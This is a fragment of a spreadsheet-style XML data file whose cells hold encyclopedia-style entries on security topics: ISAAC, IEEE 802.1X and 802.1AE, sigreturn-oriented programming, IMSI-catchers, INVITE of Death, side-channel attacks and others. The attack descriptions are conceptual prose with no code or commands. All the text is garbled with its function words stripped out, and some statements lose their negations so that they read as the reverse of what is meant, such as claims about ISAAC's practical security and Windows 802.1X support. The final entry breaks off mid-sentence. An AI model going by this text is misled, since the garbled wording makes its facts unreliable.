    <t>isma encryption authentication, version specification ismacryp) specifies encryption message authentication services mpeg-4 streams. defined internet streaming media alliance published september 2006.the isma encryption authentication, version specifies content encryption, message authentication (integrity) services, payload format file format pre-encrypted content isma 1.0, isma generally media stored elementary stream base media file format (iso/iec 14496-12). specification published november 2007. ismacryp specification defined extensions base media file format, registered registration authority code-points "mp4 family" files. ismacryp specification informative "annex provides guidelines ismacryp used together rights management system (open mobile alliance drm). packetized content format almost based ismacryp format.there alternatives ismacryp, srtp ipsec, also used provide service content protection. difference three level encryption done. whereas ismacryp encrypts mpeg-4 access units (that payload), srtp encrypts whole payload, ipsec encrypts packets references external links isma technical specifications isma encryption authentication version dvb-h handheld video content protection isma encryption openipmp open source software including ismacryp</t>
  </si>
  <si>
    <t>ISAAC (cipher)</t>
  </si>
  <si>
    <t>isaac (indirection, shift, accumulate, add, count) cryptographically secure pseudorandom number generator stream cipher designed robert jenkins 1993. reference implementation source code dedicated public domain. operation isaac algorithm similarities rc4. uses array four-octet integers internal state, writing results another four-octet integer array, read time empty, point recomputed. computation consists altering i-element (i⊕128)-element, elements state array found indirection, accumulator, counter, values 255. since takes 32-bit operations 32-bit output word, fast 32-bit computers. cryptanalysis cryptanalysis undertaken marina pudovkina (2001). attack recover initial state complexity approximated less time needed searching square root possible initial states. practice means attack needs 4.67 1240 {\displaystyle 4.67\times 10^{1240}} instead 2466 {\displaystyle 10^{2466}} this result practical impact security isaac.in 2006 jean-philippe aumasson discovered several sets weak states. fourth presented (and smallest) weak states leads highly biased output first round isaac allows derivation internal state, similar weakness rc4. clear attacker tell output whether generator weak states not. also shows previous attack flawed, since paul-preneel attack based erroneous algorithm rather real isaac. improved version isaac proposed, called isaac+. usage outside cryptography many implementations isaac fast compete high speed prngs, even designed primarily speed security. only generators high quality speed exist usage. isaac used unix tool shred securely overwrite data. also isaac algorithm implemented java apache commons math library. references external links official isaac website multiple isaac implementations rosetta code pascal/delphi port math::random::isaac, perl module implementation algorithm isaac.js, javascript implementation</t>
  </si>
  <si>
    <t>ICore Virtual Accounts</t>
  </si>
  <si>
    <t>icore virtual accounts free download level virtualization (container-based virtualization) microsoft windows program program isolated virtual machine runs existing hardware operating system. allows user create multiple virtual "accounts" (virtual machines) easily created deleted without affecting other's state state core operating system.such machines create capture output virtual "account" inside virtual disk. only changes specific files programs accessible virtual account stored virtual disk attached account. install programs inside sandboxed entire system, existing inside virtual disk. each virtual account full dedicated functionality processes, files, applications. this accomplished using virtualization layer kernel host os.in contrast, programs accessible users computer usable virtual accounts without taking space there, settings bookmarks users account stay inside virtual disk. technical overview every application and/or user, program autonomous registry, process, files, services software vendors inside container without modification. version compatibility december 2010, icore supports windows also comparison platform virtualization software operating system-level virtualization sandbox (computer security) references external links official website</t>
  </si>
  <si>
    <t>SimSimi</t>
  </si>
  <si>
    <t>simsimi artificial intelligence conversation program created 2002 ismaker. application controversy protests thailand responses containing profanity criticisms leading politicians. grows artificial intelligence assisted feature allows users teach respond correctly. simsimi, pronounced "shim-shimi", korean word simsim (심심) means "bored". application designed android, windows phone (developed kevin tan) ios. simsimi reached popularity around 2015 featured youtube video youtuber comedy shorts gamer, video reached million views 2017. also chatterbot cleverbot jabberwacky references external links official website</t>
  </si>
  <si>
    <t>IEEE 802.1AE</t>
  </si>
  <si>
    <t>ieee 802.1ae (also known macsec) network security standard operates medium access control layer defines connectionless data confidentiality integrity media access independent protocols. standardized ieee 802.1 working group. details management establishment secure associations outside scope 802.1ae, specified 802.1x-2010. 802.1ae standard specifies implementation security entities (secy) thought part stations attached lan, providing secure service client. standard defines macsec frame format, similar ethernet frame, includes additional fields: security tag, extension ethertype message authentication code (icv) secure connectivity associations represent groups stations connected unidirectional secure channels security associations within secure channel. each association uses (sak). more association permitted within channel purpose change without traffic interruption (standard requires devices support least two) default cipher suite gcm-aes-128 (galois/counter mode advanced encryption standard cipher 128-bit key) gcm-aes-256 using added standard years later.security inside frame addition ethertype includes: association number within channel packet number provide unique initialization vector encryption authentication algorithms well protection replay attack optional lan-wide secure channel identifier (not required point-to-point links).the ieee 802.1ae (macsec) standard specifies protocols meet security requirements protecting data traversing ethernet lans. macsec allows unauthorised connections identified excluded communication within network. common ipsec tls, macsec defines security infrastructure provide data confidentiality, data integrity data origin authentication. assuring frame comes station claimed send macsec mitigate attacks layer protocols. publishing history: 2006 original publication (802.1ae-2006) 2011 802.1aebn amendment adds option keys standard. (802.1aebn-2011) 2013 802.1aebw amendment defines gcm-aes-xpn-128 gcm-aes-xpn-256 cipher suites order extend packet number bits. (802.1aebw-2013) 2017 802.1aecg amendment specifies ethernet data encryption devices. (802.1aecg-2017) 2018 802.1ae-2018 also kerberos using tickets allow nodes communicating non-secure network prove identity another secure manner model layer data link layer virtual (vlan) broadcast domain partitioned isolated computer network data link layer ieee 802.11i-2004 (wpa2) wi-fi protected access (wpa) wired equivalent privacy (wep) references external links 802.1ae-2018 (registration required) macsec toolkit source code toolkit implementation ieee 802.1x-2010 (macsec control plane) ieee802.1ae (macsec data plane)</t>
  </si>
  <si>
    <t>IEEE 802.1X</t>
  </si>
  <si>
    <t>ieee 802.1x ieee standard port-based network access control (pnac). part ieee 802.1 group networking protocols. provides authentication mechanism devices wishing attach wlan. ieee 802.1x defines encapsulation extensible authentication protocol (eap) wired ieee networksand 802.11 wireless networks, known "eap lan" eapol. eapol originally specified ieee 802.3 ethernet, ieee 802.5 token ring, fddi (ansi x3t9.5/x3t12 9314) 802.1x-2001, extended suit ieee technologies ieee 802.11 wireless 802.1x-2004. eapol also modified ieee 802.1ae ("macsec") ieee 802.1ar (secure device identity, devid) 802.1x-2010 support service identification optional point point encryption internal segment. overview 802.1x authentication involves three parties: supplicant, authenticator, authentication server. supplicant client device (such laptop) wishes attach lan/wlan. term 'supplicant' also used interchangeably refer software running client provides credentials authenticator. authenticator network device provides data link client network allow block network traffic two, ethernet switch wireless access point; authentication server typically trusted server receive respond requests network access, tell authenticator connection allowed, various settings apply client's connection setting. authentication servers typically software supporting radius protocols. cases, authentication server software running authenticator hardware. authenticator acts like security guard protected network. supplicant (i.e., client device) allowed access authenticator protected side network supplicant's identity validated authorized. with 802.1x port-based authentication, supplicant must initially provide required credentials authenticator specified advance network administrator could include user name/password permitted digital certificate. authenticator forwards credentials authentication server decide whether access granted. authentication server determines credentials valid, informs authenticator, turn allows supplicant (client device) access resources located protected side network. protocol operation eapol operates data link layer, ethernet framing protocol ethertype value 0x888e. port entities 802.1x-2001 defines logical port entities authenticated port—the "controlled port" "uncontrolled port". controlled port manipulated 802.1x (port access entity) allow authorized state) prevent unauthorized state) network traffic ingress egress to/from controlled port. uncontrolled port used 802.1x transmit receive eapol frames. 802.1x-2004 defines equivalent port entities supplicant; supplicant implementing 802.1x-2004 prevent higher-level protocols used content authentication successfully completed. this particularly useful method providing mutual authentication used, supplicant prevent data leakage connected unauthorized network. typical authentication progression typical authentication procedure consists initialization detection supplicant, port switch (authenticator) enabled "unauthorized" state. state, 802.1x traffic allowed; traffic, internet protocol (and udp), dropped. initiation initiate authentication authenticator periodically transmit eap-request identity frames special layer address (01:80:c2:00:00:03) local network segment. supplicant listens address, receipt eap-request identity frame, responds eap-response identity frame containing identifier supplicant user authenticator encapsulates identity response radius access-request packet forwards authentication server. supplicant also initiate restart authentication sending eapol-start frame authenticator, reply eap-request identity frame. negotiation (technically negotiation) authentication server sends reply (encapsulated radius access-challenge packet) authenticator, containing request specifying method (the type based authentication wishes supplicant perform). authenticator encapsulates request eapol frame transmits supplicant. point, supplicant start using requested method, ("negative acknowledgement") respond methods willing perform. authentication authentication server supplicant agree method, requests responses sent supplicant authentication server (translated authenticator) authentication server responds either eap-success message (encapsulated radius access-accept packet), eap-failure message (encapsulated radius access-reject packet). authentication successful, authenticator sets port "authorized" state normal traffic allowed, unsuccessful port remains "unauthorized" state. when supplicant logs off, sends eapol-logoff message authenticator, authenticator sets port "unauthorized" state, blocking non-eap traffic. implementations open-source project known open1x produces client, xsupplicant. this client currently available linux windows. main drawbacks open1x client provide comprehensible extensive user documentation fact linux vendors provide package general wpa_supplicant used 802.11 wireless networks wired networks. both support wide range types.the iphone ipod touch support 802.1x release 2.0. android support 802.1x since release donut. chrome supported 802.1x since mid-2011.macos offered native support since 10.3.avenda systems provides supplicant windows, linux macos. they also plugin microsoft framework. avenda also offers health checking agents. windows windows defaults responding 802.1x authentication requests minutes failed authentication. this cause significant disruption clients. block period configured using hkey_local_machine\software\microsoft\dot3svc\blocktime dword value (hkey_local_machine\software\microsoft\wlansvc\blocktime wireless networks) registry (entered minutes). hotfix required windows windows vista make period configurable.wildcard server certificates supported eaphost, windows component provides support operating system. implication using commercial certification authority, individual certificates must purchased. windows windows major issues handling address changes result user-based 802.1x authentication changes vlan thus subnet clients. microsoft stated backport feature vista resolves issues.if users logging roaming profiles, hotfix must downloaded installed authenticating peap peap-mschapv2. windows vista windows vista-based computers connected phone authenticate expected and, result, client placed wrong vlan. hotfix available correct this. windows windows based computers connected phone authenticate expected and, result, client placed wrong vlan. hotfix available correct this.windows respond 802.1x authentication requests initial 802.1x authentication fails. this cause significant disruption clients. hotfix available correct this. windows enterprises deploying rolling operating systems remotely, worth noting windows native support 802.1x. however, support added winpe winpe hotfixes available microsoft. although full documentation available, preliminary documentation hotfixes available microsoft blog. linux most linux distributions support 802.1x wpa_supplicant desktop integration like networkmanager. federations eduroam (the international roaming service), mandates 802.1x authentication providing network access guests visiting eduroam enabled institutions.bt (british telecom, plc) employs identity federation authentication services delivered wide variety industries governments. proprietary extensions (mac authentication bypass) devices support 802.1x authentication. examples include network printers, ethernet-based electronics like environmental sensors, cameras, wireless phones. devices used protected network environment, alternative mechanisms must provided authenticate them. option would disable 802.1x port, leaves port unprotected open abuse. another, slightly reliable option option. when configured port, port first check connected device 802.1x compliant, reaction received connected device, authenticate server using connected device's address username password. network administrator must make provisions radius server authenticate mac-addresses, either adding regular users implementing additional logic resolve network inventory database. many managed ethernet switches offer options this. vulnerabilities 802.1x-2001 802.1x-2004 shared media summer 2005, microsoft's steve riley posted article (based original research microsoft svyatoslav pidgorny) detailing serious vulnerability 802.1x protocol, involving middle attack. summary, flaw stems fact 802.1x authenticates beginning connection, authentication, possible attacker authenticated port ability physically insert (perhaps using workgroup hub) authenticated computer port. riley suggests wired networks ipsec combination ipsec 802.1x would secure.eapol-logoff frames transmitted 802.1x supplicant sent clear contain data derived credential exchange initially authenticated client. they therefore trivially easy spoof shared media used part targeted wired wireless lans. eapol-logoff attack malicious third party, access medium authenticator attached repeatedly sends forged eapol-logoff frames target device's address. authenticator (believing targeted device wishes authentication session) closes target's authentication session, blocking traffic ingressing target, denying access network. 802.1x-2010 specification, began 802.1af, addresses vulnerabilities previous 802.1x specifications, using macsec ieee 802.1ae encrypt data logical ports (running physical port) ieee 802.1ar (secure device identity devid) authenticated devices.as stopgap, enhancements widely implemented, vendors extended 802.1x-2001 802.1x-2004 protocol, allowing multiple concurrent authentication sessions occur single port. while prevents traffic devices unauthenticated addresses ingressing 802.1x authenticated port, stop malicious device snooping traffic authenticated device provides protection spoofing, eapol-logoff attacks. alternatives ietf-backed alternative protocol carrying authentication network access (pana), also carries eap, although works layer using udp, thus tied infrastructure. also aegis secureconnect ieee 802.11i-2004 references external links ieee page 802.1x getieee802 download 802.1x-2020 getieee802 download 802.1x-2010 getieee802 download 802.1x-2004 getieee802 download 802.1x-2001 ultimate wireless security guide: self-signed certificates radius server wire1x wired networking 802.1x authentication microsoft technet</t>
  </si>
  <si>
    <t>IEEE P1619</t>
  </si>
  <si>
    <t>institute electrical electronics engineers (ieee) standardization project encryption stored data, generically refers security storage working group (siswg), includes family standards protection stored data corresponding cryptographic management. standards siswg oversees work following standards: base ieee 1619 standard architecture encrypted shared storage media uses xts-advanced encryption standard (xex-based tweaked codebook mode (tcb) ciphertext stealing (cts); proper name (xex cts), acronym already used denote drug ecstasy. p1619.1 authenticated encryption length expansion storage devices uses following algorithms: counter mode cbc-mac (ccm) galois/counter mode (gcm) cipher block chaining (cbc) hmac-secure hash algorithm xts-hmac-secure hash algorithmthe p1619.2 standard wide-block encryption shared storage media proposed algorithms including: eme2the p1619.3 standard management infrastructure cryptographic protection stored data defines system managing encryption data rest security objects includes architecture, namespaces, operations, messaging transport. p1619 also standardized backup format. narrow-block wide-block encryption encryption algorithm used data storage support independent encryption decryption portions data. so-called narrow-block algorithms operate relatively small portions data, wide-block algorithms encrypt decrypt whole sector. narrow-block algorithms advantage efficient hardware implementation. hand, smaller block size provides finer granularity data modification attacks. there standardized "acceptable granularity"; however, example, possibility data modification granularity (bit-flipping attack) generally considered unacceptable. reasons, working group selected narrow-block (128 bits) encryption authentication standard p1619, assuming added efficiency warrants additional risk. recognizing wide-block encryption might useful cases, another project p1619.2 started study usage wide-block encryption. project maintained ieee security storage working group (siswg). both disk storage standard p1619 (sometimes called p1619.0) tape storage standard p1619.1 standardized december 2007.a discussion ongoing standardization wide-block encryption disk drives, like p1619.2, management p1619.3. issue from 2004 2006, drafts p1619 standards used advanced encryption standard (aes) mode. 2006 meeting siswg, straw poll showed members would approve p1619 was. consequently, lrw-aes replaced xex-aes tweakable block cipher p1619.0 draft (and renamed xts-aes draft 11). some members group found non-trivial abandon lrw, available public peer-review many years (unlike newly suggested variants). issues were: attacker derive tweak ciphertext plaintext contains k2||0n 0n||k2. here concatenation operator zero block. this issue software encrypts partition operating system encryption software running time). operating system could write tweak encrypted swap/hibernation file. tweak known, offer indistinguishability chosen plaintext attack (ind-cpa) anymore, input block permutation attacks mode possible. leak tweak affect confidentiality plaintext. also comparison disk encryption software disk encryption encryption full disk encryption management management interoperability protocol on-the-fly encryption references external links siswg home page email archive siswg general p1619 particular email archive p1619.1 (authenticated encryption) email archive p1619.2 (wide-block encryption) email archive p1619.3 (key management) (withdrawn)</t>
  </si>
  <si>
    <t>Sigreturn-oriented programming</t>
  </si>
  <si>
    <t>sigreturn-oriented programming (srop) computer security exploit technique allows attacker execute code presence security measures non-executable memory code signing. presented first time 35th ieee symposium security privacy 2014 best student paper award. this technique employs basic assumptions behind return-oriented programming (rop) technique: attacker controlling call stack, example stack buffer overflow, able influence control flow program simple instruction sequences called gadgets. attack works pushing forged sigcontext structure call stack, overwriting original return address location gadget allows attacker call sigreturn system call. often single gadget needed successfully attack effect. this gadget reside fixed location, making attack simple effective, setup generally simpler portable needed plain return-oriented programming technique.sigreturn-oriented programming considered weird machine since allows code execution outside original specification program. background sigreturn-oriented programming (srop) technique similar return-oriented programming (rop), since employs code reuse execute code outside scope original control flow. sense, adversary needs able carry stack smashing attack, usually stack buffer overflow, overwrite return address contained inside call stack. stack hopping exploits mechanisms data execution prevention employed, possible attacker place shellcode stack cause machine execute overwriting return address. with protections place, machine execute code present memory areas marked writable non-executable. therefore, attacker need reuse code already present memory. most programs contain functions allow attacker directly carry desired action (e.g., obtain access shell), necessary instructions often scattered around memory.return-oriented programming requires sequences instructions, called gadgets, instruction. way, attacker write sequence addresses gadgets stack, soon instruction gadget executed, control flow proceed next gadget list. signal handler mechanism this attack made possible signals handled posix-like systems. whenever signal delivered, kernel needs context switch installed signal handler. kernel saves current execution context frame stack. structure pushed onto stack architecture-specific variant sigcontext structure, holds various data comprising contents registers moment context switch. when execution signal handler completed, sigreturn() system call called. calling sigreturn syscall means able easily contents registers using single gadget easily found systems. differences there several factors characterize srop exploit distinguish classical return-oriented programming exploit.first, dependent available gadgets, different distinct binaries, thus making chains gadget non-portable. address space layout randomization (aslr) makes hard gadgets without information leakage exact positions memory. although turing-complete compilers exist, usually non-trivial create chain.srop exploits usually portable across different binaries minimal effort allow easily setting contents registers, could non-trivial unfeasible exploits needed gadgets present. moreover, srop requires minimal number gadgets allows constructing effective shellcodes chaining system calls. these gadgets always present memory, cases always fixed locations: attacks linux example kind gadget needed srop exploits always found vdso memory area x86-linux systems: linux kernel versions, aslr disabled setting limit stack size unlimited, effectively bypassing aslr allowing easy access gadget present vdso. linux kernels prior version 3.3, also possible find suitable gadget inside vsyscall page, mechanism accelerate access certain system calls often used legacy programs resides always fixed location. turing-completeness possible gadgets write contents stack frames, thereby constructing self-modifying program. using technique, possible devise simple virtual machine, used compilation target turing-complete language. example approach found bosman's paper, demonstrates construction interpreter language similar brainfuck programming language. language provides program counter memory pointer temporary register used 8-bit addition this means also complex backdoors obfuscated attacks devised. defenses mitigations number techniques exists mitigate srop attacks, relying address space layout randomization, canaries cookies, shadow stacks. address space layout randomization address space layout randomization makes harder suitable gadgets making locations unpredictable. signal cookies mitigation srop called signal cookies proposed. consists verifying sigcontext structure tampered means random cookie xored address stack location stored. way, sigreturn syscall needs verify cookie's existence expected location, effectively mitigating srop minimal impact performances. vsyscall emulation linux kernel versions greater 3.3, vsyscall interface emulated, attempt directly execute gadgets page result exception. grsecurity patches linux kernel harden improve system security. includes so-called return-address protection (rap) help protect code reuse attacks. starting 2016, intel developing control-flow enforcement technology (cet) help mitigate prevent stack-hopping exploits. works implementing shadow stack contain return addresses, protected cpu's memory management unit. also linux kernel interfaces vulnerability (computing) exploit (computer security) buffer overflow address space layout randomization executable space protection references external links 2013: review “returning signals profit playing around srop srop exploitation binjitsu sigreturn oriented programming sigreturn oriented programming x86-64 linux sigreturn exploitation technique (signal's stack frame win)</t>
  </si>
  <si>
    <t>IMAX 432</t>
  </si>
  <si>
    <t>imax (intel multifunction applications executive intel micromainframe) operating system developed intel digital electronic computers based 1980s intel iapx 32-bit microprocessor. term micromainframe intel marketing designation describing iapx processor's capabilities comparable mainframe. iapx processor imax operating system incompatible architecture commonly found personal computers. imax implemented subset original (1980) version ada, extended runtime type checking dynamic package creation.as 1982 imax version imax aimed programmers rather application users, provide command line human interface. imax provided runtime environment programming language high-level languages, well incomplete compiler extended cover full programming language later imax version version 2.there least versions imax 1982, version version version undergoing internal intel testing 1981 scheduled released 1982. version modular programmer could choose parts imax operating system load; standard configurations imax version named "full" "minimal", minimal configuration similar version imax. 1982, version imax planned release, support virtual memory. also history operating systems references bibliography kahn, kevin corwin, william dennis, don; d'hooge, herman; hubka, david hutchins, linda montague, john pollack, fred (december 1981). "imax: multiprocessor operating system object-based computer" (pdf). sigops operating systems review. (5): 127–136. doi:10.1145/800216.806601. zeigler, stephen weicker, reinhold (may–june 1983). "ada language statistics imax operating system". sigada letters. association computing machinery. (6): 63–67. doi:10.1145/989813.989818.</t>
  </si>
  <si>
    <t>IMSI-catcher</t>
  </si>
  <si>
    <t>international mobile subscriber identity-catcher, imsi-catcher, telephone eavesdropping device used intercepting mobile phone traffic tracking location data mobile phone users. essentially "fake" mobile tower acting target mobile phone service provider's real towers, considered man-in-the-middle (mitm) attack. wireless standard offers risk mitigation mutual authentication required handset network. however, sophisticated attacks able downgrade non-lte network services require mutual authentication.imsi-catchers used number countries enforcement intelligence agencies, raised significant civil liberty privacy concerns strictly regulated countries german strafprozessordnung (stpo code criminal procedure). some countries encrypted phone data traffic weak encryption), thus rendering imsi-catcher unnecessary. overview virtual base transceiver station (vbts) device identifying temporary mobile subscriber identity (tmsi), international mobile subscriber identity (imsi) nearby mobile phone intercepting calls, even advanced enough detect international mobile equipment identity (imei). patented first commercialized rohde schwarz 2003. device viewed simply modified cell tower malicious operator, january 2012, court appeal england wales held patent invalid obviousness.imsi-catchers often deployed court order without search warrant, lower judicial standard register trap-and-trace order preferred enforcement. they also used search rescue operation missing persons. police departments reluctant reveal programs contracts vendors harris corporation, maker stingray kingfish phone tracker devices.in first public body admit using imsi catchers scottish prison service, though likely metropolitan police service using imsi catchers since 2011 before.body-worn imsi-catchers target nearby mobile phones advertised enforcement agencies us.the specification requires handset authenticate network, require network authenticate handset. this well-known security hole exploited imsi catcher. imsi catcher masquerades base station logs imsi numbers mobile stations area, attempt attach imsi-catcher. allows forcing mobile phone connected call encryption (a5/0 mode) easily breakable encryption (a5/1 a5/2 mode), making call data easy intercept convert audio. wireless standard mitigates risk enhanced security protocol mutual authentication required handset network removes false base station attack gsm. some sophisticated attacks able downgrade non-lte network services require mutual authentication. functionalities identifying imsi every mobile phone requirement optimize reception. base station subscribed network operator accessible, always choose strongest signal. imsi-catcher masquerades base station causes every mobile phone simulated network operator within defined radius with help special identity request, able force transmission imsi. tapping mobile phone imsi-catcher subjects phones vicinity man-in-the-middle attack, appearing preferred base station terms signal strength. with help sim, simultaneously logs network mobile station. since encryption mode chosen base station, imsi-catcher induce mobile station encryption all. hence encrypt plain text traffic mobile station pass base station. targeted mobile phone sent signals user able tell apart device authentic cell service provider infrastructure. this means device able retrieve data normal cell tower receives mobile phones registered.there indirect connection mobile station imsi-catcher network. reason, incoming phone calls cannot generally patched mobile station network, although modern versions devices mobile patch-through solutions order provide functionality. passive imsi detection difference passive imsi-catcher active imsi-catcher active imsi-catcher intercepts data transfer spoke, text, mail, traffic endpoint cell tower. active imsi-catchers generally also intercept conversations data traffic within large range therefore also called rogue cell towers. sends signal plethora commands endpoints, respond establishing connection routes conversations data traffic endpoints actual cell tower long attacker wishes. passive imsi-catcher hand detects imsi, tmsi imei endpoint. once imsi, tmsi imei address detected, endpoint immediately released. passive imsi-catcher sends signal specific command endpoints, respond share identifiers endpoint passive imsi-catcher. vendors passive imsi-catchers take privacy account. universal mobile telecommunications system (umts) false base station attacks prevented combination freshness integrity protection signaling data, authenticating serving network.to provide high network coverage, umts standard allows inter-operation gsm. therefore, umts also base stations connected umts service network. this fallback security disadvantage allows possibility man-in-the-middle attack. tell-tales difficulties assignment imsi catcher number difficulties: must ensured mobile phone observed person standby mode correct network operator found out. otherwise, mobile station, need simulated base station. depending signal strength imsi-catcher, numerous imsis located. problem find right one. mobile phones area covered catcher access network. incoming outgoing calls cannot patched subscribers. only observed person indirect connection. there disclosing factors. cases, operation cannot recognized immediately subscriber. mobile phones show small symbol display, e.g. exclamation point, encryption used. this "ciphering indication feature" suppressed network provider, however, setting efad card. since network access handled sim/usim imsi-catcher, receiver cannot number calling party. course, also implies tapped calls listed itemized bill. assignment near base station difficult, high signal level original base station. mobile phones prefer faster modes communication downgrading require blocking frequency ranges detection counter-measures some preliminary research done trying detect frustrate imsi-catchers. project osmocom open source mobile station software. this special type mobile phone firmware used detect fingerprint certain network characteristics imsi-catchers, warn user device operating area. firmware/software-based detection strongly limited select few, outdated mobile phones (i.e. motorola) longer available open market. main problem closed-source nature major mobile phone producers. application android imsi-catcher detector (aimsicd) developed detect circumvent imsi-catchers stingray silent sms. technology stationary network imsi-catcher detectors also developed. several apps listed google play store imsi catcher detector apps include snoopsnitch, cell catcher, finder 100,000 500,000 downloads each. however, apps limitations access phone's underlying hardware offer minimal protection. also telephone tapping stingray phone tracker mobile phone jammer external links chris paget's presentation practical cellphone spying verrimus mobile phone intercept detection footnotes further reading soltani, ashkan; timberg, craig september 2014). "tech firm tries pull back curtain surveillance efforts washington". washington post. barrett, devlin november 2014). "americans' cellphones targeted secret u.s. program". wall street journal. retrieved november 2014. soltani, ashkan; timberg, craig september 2014). "tech firm tries pull back curtain surveillance efforts washington". washington post. yomna june 2019). "gotta catch all: understanding imsi-catchers exploit cell networks". electronic frontier foundation. external links mobile phone networks: tale tracking, spoofing owning mobile phones imsi-catcher seminar paper presentation mini imsi imei catcher osmocombb project micronet: proximus imsi imei dual band catcher micronet-u: proximus umts catcher iparanoid: imsi catcher intrusion detection system presentation vulnerability design mobile network security</t>
  </si>
  <si>
    <t>SigSpoof</t>
  </si>
  <si>
    <t>sigspoof (cve-2018-12020) family security vulnerabilities affected software package privacy guard ("gnupg") since version 0.2.2, released 1998. several software packages make gnupg also affected, pass enigmail.in un-patched versions affected software, sigspoof attacks allow cryptographic signatures convincingly spoofed, certain circumstances. this potentially enables wide range subsidiary attacks succeed. references</t>
  </si>
  <si>
    <t>INVITE of Death</t>
  </si>
  <si>
    <t>invite death type attack voip-system involves sending malformed otherwise malicious invite request telephony server, resulting crash server. because telephony usually critical application, damage causes significant disruption users poses tremendous acceptance problems voip. these kinds attacks necessarily affect sip-based systems; implementations vulnerabilities voip area affected. attack also transported messages invite. example, december 2007 report vulnerability message ("bye bye") using obsolete header name "also". however, sending invite packets popular attacking telephony systems. name reference ping death attack caused serious trouble 1995–1997. voip servers (invite death) invite death vulnerability found february 2009. vulnerability allows attacker crash server causing remote denial service (dos) sending single malformed packet. impersonator can, using malformed packet, overflow specific string buffers, large number token characters, modify fields illegal fashion. result, server tricked undefined state, lead call processing delays, unauthorized access, complete denial service. problem specifically exists opensbc version 1.1.5-25 handling “via” field maliciously crafted packet. invite death packet also used find vulnerability patched opensbc server network dialog minimization.for popular open source-based asterisk pbx, security advisories cover signaling-related problems, also problems protocols resolution. problems malformed attachments codex numbers valid range obsolete headers “also”. invite death specifically problem operators servers public internet. because allows usage packets, easy attacker spoof source address internet send invite death untraceable locations. sending kinds requests periodically, attackers completely interrupt telephony service. choice service provider upgrade systems attack crash system anymore. voip phones large number voip vulnerabilities exist phones. attacks voip phones less critical attacks central devices like ip-pbx, usually, endpoint affected. references external links debian security advisory</t>
  </si>
  <si>
    <t>Side-channel attack</t>
  </si>
  <si>
    <t>computer security, side-channel attack attack based extra information gathered fundamental computer protocol algorithm implemented, rather flaws design protocol algorithm (e.g. flaws found cryptanalysis cryptographic algorithm) minor, potentially devastating, mistakes oversights implementation. (cryptanalysis also includes searching side-channel attacks.) timing information, power consumption, electromagnetic leaks, sound examples extra information could exploited facilitate side-channel attacks. some side-channel attacks require technical knowledge internal operation system, although others differential power analysis effective black-box attacks. rise applications software-as-a-service also significantly raised possibility side-channel attacks web, even transmissions browser server encrypted (e.g. https wifi encryption), according researchers microsoft research indiana university. many powerful side-channel attacks based statistical methods pioneered paul kocher.attempts break cryptosystem deceiving coercing people legitimate access typically considered side-channel attacks: social engineering rubber-hose cryptanalysis. general general classes side-channel attack include: cache attack attacks based attacker's ability monitor cache accesses made victim shared physical system virtualized environment type cloud service. timing attack attacks based measuring much time various computations (such say, comparing attacker's given password victim's unknown one) take perform. power-monitoring attack attacks make varying power consumption hardware computation. electromagnetic attack attacks based leaked electromagnetic radiation, directly provide plaintexts information. such measurements used infer cryptographic keys using techniques equivalent power analysis used non-cryptographic attacks, e.g. tempest (aka phreaking radiation monitoring) attacks. acoustic cryptanalysis attacks exploit sound produced computation (rather like power analysis). differential fault analysis secrets discovered introducing faults computation. data remanence sensitive data read supposedly deleted. (e.g. cold boot attack) software-initiated fault attacks currently rare class side channels, hammer example off-limits memory changed accessing adjacent memory often (causing state retention loss). optical secrets sensitive data read visual recording using high resolution camera, devices capabilities (see examples below).in cases, underlying principle physical effects caused operation cryptosystem side) provide useful extra information secrets system, example, cryptographic key, partial state information, full partial plaintexts forth. term cryptophthora (secret degradation) sometimes used express degradation secret material resulting side-channel leakage. examples cache side-channel attack works monitoring security critical operations t-table entry modular exponentiation multiplication memory accesses. attacker able recover secret depending accesses made made) victim, deducing encryption key. also, unlike side-channel attacks, method create fault ongoing cryptographic operation invisible victim. 2017, vulnerabilities (dubbed meltdown spectre) discovered, cache-based side channel allow attacker leak memory contents processes operating system itself. timing attack watches data movement memory hardware running cryptosystem algorithm. simply observing variations long takes perform cryptographic operations, might possible determine entire secret key. such attacks involve statistical analysis timing measurements demonstrated across networks.a power-analysis attack provide even detailed information observing power consumption hardware device cryptographic circuit. these attacks roughly categorized simple power analysis (spa) differential power analysis (dpa). example machine learning approaches in.fluctuations current also generate radio waves, enabling attacks analyze measurements electromagnetic (em) emanations. these attacks typically involve similar statistical techniques power-analysis attacks. deep-learning-based side-channel attack, using power information across multiple devices demonstrated potential break secret different identical device single trace. historical analogues modern side-channel attacks known. recently declassified document reveals back 1943, engineer bell telephone observed decipherable spikes oscilloscope associated decrypted output certain encrypting teletype. according former officer peter wright, british security service analyzed emissions french cipher equipment 1960s. 1980s, soviet eavesdroppers suspected planted bugs inside selectric typewriters monitor electrical noise generated type ball rotated pitched strike paper; characteristics signals could determine pressed.power consumption devices causes heating, offset cooling effects. temperature changes create thermally induced mechanical stress. this stress create level acoustic emissions operating cpus (about cases). recent research shamir suggested information operation cryptosystems algorithms obtained well. this acoustic cryptanalysis attack. surface chip, cases package, observed, infrared images also provide information code executed cpu, known thermal-imaging attack.an optical side-channel attack examples include gleaning information hard disk activity indicator reading small number photons emitted transistors change state.allocation-based side channels also exist refer information leaks allocation opposed use) resource network bandwidth clients concurrently requesting contended resource. countermeasures because side-channel attacks rely relationship information emitted (leaked) side channel secret data, countermeasures fall main categories: eliminate reduce release information eliminate relationship leaked information secret data, make leaked information unrelated, rather uncorrelated, secret data, typically form randomization ciphertext transforms data undone cryptographic operation (e.g., decryption) completed. under first category, displays special shielding lessen electromagnetic emissions, reducing susceptibility tempest attacks, commercially available. power line conditioning filtering help deter power-monitoring attacks, although measures must used cautiously, since even small correlations remain compromise security. physical enclosures reduce risk surreptitious installation microphones counter acoustic attacks) micro-monitoring devices (against power-draw thermal-imaging attacks). another countermeasure (still first category) emitted channel noise. instance, random delay added deter timing attacks, although adversaries compensate delays averaging multiple measurements (or, generally, using measurements analysis). amount noise side channel increases, adversary needs collect measurements. another countermeasure first category security analysis software identify certain classes side-channel attacks found design stages underlying hardware itself. timing attacks cache attacks identifiable certain commercially available security analysis software platforms, allow testing identify attack vulnerability itself, well effectiveness architectural change circumvent vulnerability. comprehensive method employ countermeasure create secure development lifecycle hardware, includes utilizing available security analysis platforms respective stages hardware development lifecycle.in case timing attacks targets whose computation times quantized discrete clock cycle counts, effective countermeasure design software isochronous, exactly constant amount time, independently secret values. this makes timing attacks impossible. such countermeasures difficult implement practice, since even individual instructions variable timing cpus. partial countermeasure simple power attacks, differential power-analysis attacks, design software "pc-secure" "program counter security model". pc-secure program, execution path depend secret values. words, conditional branches depend public information. (this restrictive condition isochronous code, less restrictive condition branch-free code.) even though 